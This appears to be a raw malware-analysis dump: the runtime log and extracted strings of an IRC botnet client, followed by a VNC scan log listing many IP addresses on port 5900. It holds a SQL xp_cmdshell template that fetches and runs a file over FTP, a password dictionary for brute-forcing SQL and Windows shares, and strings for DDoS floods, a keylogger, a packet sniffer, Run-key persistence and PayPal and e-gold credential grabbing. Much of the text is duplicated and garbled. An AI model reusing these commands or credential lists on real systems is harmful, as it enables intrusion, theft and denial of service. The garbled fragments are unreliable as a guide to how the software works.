[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
emj.exe.
emj.exe.
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
em.exe.
em.exe.
%System%\pwyqire.exe
%System%\pwyqire.exe
19584375
19584375
000000009
000000009
pwyqire.exe_500_rwx_00400000_0009C000:
iexplorer.exe_1652:
.text
.text
`.rdata
`.rdata
@.data
@.data
tTSSh,
tTSSh,
YYu.jWX
YYu.jWX
uDPh
uDPh
GWSSh
GWSSh
t1SSSSh
t1SSSSh
u.hpfB
u.hpfB
(msql)
(msql)
Trying: (%s:%d) user: (%s/%s).
Trying: (%s:%d) user: (%s/%s).
IP: %s
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
winpass
winpass
sqlpassoainstall
sqlpassoainstall
databasepassword
databasepassword
databasepass
databasepass
dbpassword
dbpassword
dbpass
dbpass
domainpassword
domainpassword
domainpass
domainpass
loginpass
loginpass
login
login
windows
windows
1234567890
1234567890
123456789
123456789
12345678
12345678
1234567
1234567
pass1234
pass1234
passwd
passwd
password
password
password1
password1
Windows XP (SP0 SP1)
Windows XP (SP0 SP1)
Windows NT4, 2000 (SP0-SP4)
Windows NT4, 2000 (SP0-SP4)
\\%s\pipe\browser
\\%s\pipe\browser
\\%s\ipc$
\\%s\ipc$
sqlpass
sqlpass
%s %s %s User: (%s) Pass: (%s)
%s %s %s User: (%s) Pass: (%s)
(no password)
(no password)
%s\%s\%s
%s\%s\%s
c$\windows\system32
c$\windows\system32
%s\ipc$
%s\ipc$
99999999
99999999
21122112
21122112
00000000
00000000
Password
Password
newpass
newpass
passe
passe
!@#$%^&*
!@#$%^&*
~!@#$%^&
~!@#$%^&
monkey
monkey
7654321
7654321
87654321
87654321
%systemroot%\system32\cmd.exe
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
VNC%d.%d %s: %s - [AuthBypass]
RFB d.d
RFB d.d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
port
port
nick
nick
join
join
tftp
tftp
rndnick
rndnick
httpstop
httpstop
opencmd
opencmd
cmdstop
cmdstop
rcmd
rcmd
httpcon
httpcon
keylog
keylog
*@im.batman
*@im.batman
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%s %s
%s %s
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%s %s :%s
%s %s :%s
PRIVMSG
PRIVMSG
PRIVMSG %s :%s
PRIVMSG %s :%s
%s Failed to start IO thread, error %d
%s Failed to start IO thread, error %d
cmd.exe
cmd.exe
%s: %s (%s)
%s: %s (%s)
The following Windows services are registered:
The following Windows services are registered:
%s User info error: <%ld>
%s User info error: <%ld>
Units Per Week: %d
Units Per Week: %d
Max. Storage: %d
Max. Storage: %d
User's Language: %d
User's Language: %d
Country Code: %d
Country Code: %d
Workstations: %S
Workstations: %S
Logon Server: %S
Logon Server: %S
Last Logoff: %d
Last Logoff: %d
Last Logon: %d
Last Logon: %d
Number of Logins: %d
Number of Logins: %d
Bad Password Count: %d
Bad Password Count: %d
Password Age: %d
Password Age: %d
Parameters: %S
Parameters: %S
Home Directory: %S
Home Directory: %S
Auth Flags: %d
Auth Flags: %d
Privilege Level: %s
Privilege Level: %s
Comment: %S
Comment: %S
User Comment: %S
User Comment: %S
Full Name: %S
Full Name: %S
Account: %S
Account: %S
The password is shorter than required (or does not meet the password policy requirement.)
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
This network request is not supported.
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s Message sent successfully
%s Message sent successfully
%s Not supported by this system
%s Not supported by this system
%s Unable to allocation ARP cache
%s Unable to allocation ARP cache
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%s ARP cache is empty
%s ARP cache is empty
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%d.%d.%d.%d
%d.%d.%d.%d
%s %s HTTP/1.1
%s %s HTTP/1.1
Referer: %s
Referer: %s
Host: %s
Host: %s
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
%s %s Drive (%s): Failed to stat, device not ready.
%s (%d)
%s (%d)
%s Process list failed
%s Process list failed
%s Process list completed
%s Process list completed
%s Listing processes:
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Network shares deleted
%s Failed to delete '%S' share.
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to open DCOM registry key
%s Failed to open DCOM registry key
%s DCOM disabled
%s DCOM disabled
%s Disable DCOM failed
%s Disable DCOM failed
%s Network shares added
%s Network shares added
%s Failed to add '%s' share.
%s Failed to add '%s' share.
%s Share '%s' added.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s DCOM enabled
%s DCOM enabled
%s Enable DCOM failed
%s Enable DCOM failed
%s Transfer Complete On %s Executing ::(
%s Transfer Complete On %s Executing ::(
%s Error: socket() failed, returned: %d
%s Error: socket() failed, returned: %d
%s Failed to send to Remote command shell
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open remote command shell
%s Failed to open socket
%s Failed to open socket
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Unable to open socket
%s Unable to open socket
.DCC SEND %s %i %i %i.
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s File doesn't exist
%s Failed to bind to socket
%s Failed to bind to socket
%s Failed to create socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Socket error
%s Error opening socket
%s Error opening socket
%s Error opening file for writing
%s Error opening file for writing
%s Error unable to write file to disk
%s Error unable to write file to disk
%d. %s = %s
%d. %s = %s
%s IP: %s Port: %d is open
%s IP: %s Port: %d is open
IP: %s Port: %d
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s
%s Opened: %s
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
A%s CRC Failed (%d != %d)
A%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Couldn't open file: %s
%s Couldn't open file: %s
%s %s: No service specified
%s %s: No service specified
%s Error with service: '%s'. %s
%s Error with service: '%s'. %s
%s %s service: '%s'.
%s %s service: '%s'.
%s %s: No share specified
%s %s: No share specified
%s %s share: '%s'.
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%s %s: Error with share: '%s'. %s
%s Share list error: %s <%ld>
%s Share list error: %s <%ld>
%s %s: No username specified
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
%s %s username: '%s'
Total users found: %d.
Total users found: %d.
%s An access violation has occured
%s An access violation has occured
%s User list error: %s <%ld>
%s User list error: %s <%ld>
PRIVMSG %s :Found %s Files and %s Directories
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE>
"><CODE>%s</CODE>
PRIVMSG %s :%-31s %-21s (%s bytes)
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE>
"><CODE>%s/</CODE>
%s%s/
%s%s/
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s List complete.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
%s Failed to start worker thread, error %d
%s Worker thread of server thread: %d
%s Error: server failed, returned %d
MODE %s %s
USERHOST %s
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s %s System
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Invalid flood type specified.
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
%s File not found: %s
tcpflood
udpflood
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s%s.exe
ddos.random
ddos.ack
ddos.syn
%s Repeat not allowed in command line: %s
%s Repeat: %s
Mode change: %s
MODE %s
Action: %s: %.
ACTION %s
Privmsg: %s: %s
%s Alias added: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s %s %s :%s
%s Command unknown
%s No message specified
%s User list failed
%s User list completed
%s Share list failed
%s Share list completed
%s Service list failed
%s Service list complete.
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
%s Read file failed: %s
%s Read file complete: %s
%s Commands: %s
%s Error sending to remote shell
%s Command sent
%s Client not open
List: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s File opened: %s
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Killed thread: %s
%s No active threads found
%s Stopped: %d thread(s)
IRC Raw: %s
Parted channel: '%s'.
PART %s
Joined channel: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s DNS cache flushed
%s Failed to flush ARP cache
%s ARP cache flushed
Login list complete
%d. %s
%s Remote shell ready
%s Couldn't open remote shell
%s Remote shell already running
%s Uptime: %s
%s Failed to start listing thread, error %d
%s Proccess list
%s Failed to start listing thread, error %d
%s Failed to start list thread, error %d
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
QUIT :%s
[TFTP]
tftpstop
UDP flood
udpstop
ddos.stop
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s Random nick change: %s
$rndnick
User: %s logged in
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Chat from user: %s
%s Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
VERSION %s
%s Failed to start transfer thread, error %d
%s Receive file: '%s' from user: %s.
%s User: %s logged out
Joined channel: %s
:%s%s
NICK
NOTICE %s :%s
%s User %s logged out
NICK %s
JOIN %s %s
PONG %s
USER %s 0 0 :%s
PASS %s
Connected to %s
%s Bot started
%s %d "%s"
%s\%s
Total: %d in %s
[%s]: %d,
tftp -i %s get %s &%s
%s Scan not active.
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
-[DDoS]: Send error: <%d>.
IP: %s (%s).
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 StnyFtpd
331 Password required
220 StnyFtpd 0wns j0
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s.bck
sfc_os.dll
TCPIP.SYS fixed, version %d.
%s\drivers\tcpip.sys
Patching tcpip.sys.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
https:/
http:/
[pStore] %s %s:%s
pstorec.dll
|%.2d|%s|
[%d]%s
[%s|%s|%s|%s]-
Ý %dh %dm
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SYN]: Send error: <%d>.
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s
%s (%s)
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Invalid target IP.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
:POST / HTTP/1.0
Content-Length: %d
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
%s No %s thread found.
%s %s %s stopped. (%d thread(s) stopped.)
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
GetProcessWindowStation
PeekNamedPipe
CreatePipe
KERNEL32.dll
USER32.dll
WS2_32.dll
VERSION.dll
GetCPInfo
Gt8%S
iexplorer.exe
sysconfig.dat
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
frozynv.ODIN2-VALHALL.COM
ntpass
NTPass
sql-1433
;3 #>6.&
'2, / 0&7!4-)1#
tftp.exe -i get
:.login
:!login
:.ident
:.hashin
:.secure
:.auth
login
.download
.update
getcftp
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
e-gold.com
e-gold.co.uk
zcÁ
.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
IP: 174.12.231.242:5900, Scan thread: 1, Sub-thread: 124.
IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.
IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.
IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.
IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.
IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.
IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.
IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.
IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.
IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.
IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.
IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.
IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.
IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.
IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.
IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.
IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.
IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.
IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.
IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.
IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.
IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.
IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.
IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.
IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.
IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.
IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.
IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.
IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.
IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.
IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.
IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.
IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.
IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.
IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.
IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.
IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.
IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.
IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.
IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.
IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.
IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.
IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.
IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.
IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.
IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.
IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.
IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.
IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.
IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.
IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.
IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.
IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.
IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.
IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.
IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.
IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.
IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.
IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.
IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.
IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.
IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.
IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.
IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.
IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.
IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.
IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.
IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.
IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.
IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.
IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.
IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.
IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.
IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.
IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.
IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.
IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.
IP: 174.79.76.14:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.79.76.14:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.5.231.8:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.5.231.8:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.43.3.165:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.43.3.165:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.32.9.192:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.32.9.192:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.152.44.125:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.152.44.125:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.126.75.153:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.126.75.153:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.27.213.7:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.27.213.7:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.201.145.20:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.201.145.20:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.172.23.32:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.172.23.32:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.57.3.30:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.57.3.30:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.234.170.240:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.234.170.240:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.114.91.136:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.114.91.136:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.19.210.38:5900, Scan thread: 1, Sub-thread: 175.
IP: 174.19.210.38:5900, Scan thread: 1, Sub-thread: 175.
